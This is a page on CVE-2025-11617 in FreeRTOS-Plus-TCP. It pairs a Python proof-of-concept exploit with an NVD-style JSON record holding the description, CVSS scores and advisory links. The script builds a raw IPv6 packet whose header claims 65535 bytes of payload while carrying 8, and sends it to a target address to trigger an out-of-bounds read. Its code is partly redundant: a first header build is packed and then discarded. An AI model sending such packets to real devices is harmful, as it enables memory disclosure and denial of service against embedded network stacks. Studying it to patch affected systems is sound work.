CVE-2025-11617

# CVE-2025-11617 PoC - FreeRTOS-Plus-TCP IPv6 OOB Read # This PoC demonstrates crafting a malicious IPv6 packet with incorrect payload length # to trigger out-of-bounds read in FreeRTOS-Plus-TCP IPv6 processing code. import socket import struct def craft_malicious_ipv6_packet(target_ip="fe80::1"): """ Craft an IPv6 packet with an oversized payload length field to trigger OOB read in vulnerable FreeRTOS-Plus-TCP versions. """ # IPv6 Header format: # Version (4 bits) | Traffic Class (8 bits) | Flow Label (20 bits) # Payload Length (16 bits) | Next Header (8 bits) | Hop Limit (8 bits) # Source Address (128 bits) # Destination Address (128 bits) version_tc_fl = 0x60000000 # Version 6, TC=0, Flow Label=0 actual_payload_len = 8 # Actual payload is only 8 bytes malicious_payload_len = 65535 # Claimed payload length is maximum (OOB trigger) next_header = 59 # No next header (ICMPv6=58, TCP=6, UDP=17) hop_limit = 64 src_addr = socket.inet_pton(socket.AF_INET6, "fe80::2") dst_addr = socket.inet_pton(socket.AF_INET6, target_ip) # Build IPv6 header with malicious payload length ipv6_header = struct.pack( "!IHBB", version_tc_fl | (malicious_payload_len & 0xFFFF), 0, # Upper part combined above next_header, hop_limit ) # Note: struct packing adjusted for proper header layout ipv6_header = struct.pack( "!IHBB16s16s", version_tc_fl, malicious_payload_len, next_header, hop_limit, src_addr, dst_addr ) # Actual small payload (only 8 bytes) payload = b"\x41" * actual_payload_len # Create raw socket and send try: sock = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_HDRINCL, 1) sock.sendto(ipv6_header + payload, (target_ip, 0)) print(f"[*] Malicious IPv6 packet sent to {target_ip}") print(f"[*] Claimed payload length: {malicious_payload_len}") print(f"[*] Actual payload length: {actual_payload_len}") except PermissionError: print("[!] Need root/admin privileges to send raw IPv6 packets") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": craft_malicious_ipv6_packet()

{"cve": {"id": "CVE-2025-11617", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-10-10T18:15:38.280", "lastModified": "2025-10-31T18:22:57.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A missing validation check in FreeRTOS-Plus-TCP's IPv6 packet processing code can lead to an out-of-bounds read when receiving a IPv6 packet with incorrect payload lengths in the packet header. This issue only affects applications using IPv6.\n\nWe recommend users upgrade to the latest version and ensure any forked or derivative code is patched to incorporate the new fixes."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:freertos-plus-tcp:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.3.4", "matchCriteriaId": "89B35827-054F-4712-A2AB-FB26C87C9C56"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-023/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/releases/tag/V4.3.4", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Release Notes"]}, {"url": "https://github.com/FreeRTOS/FreeRTOS-Plus-TCP/security/advisories/GHSA-wmjr-wm93-cvv2", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}]}}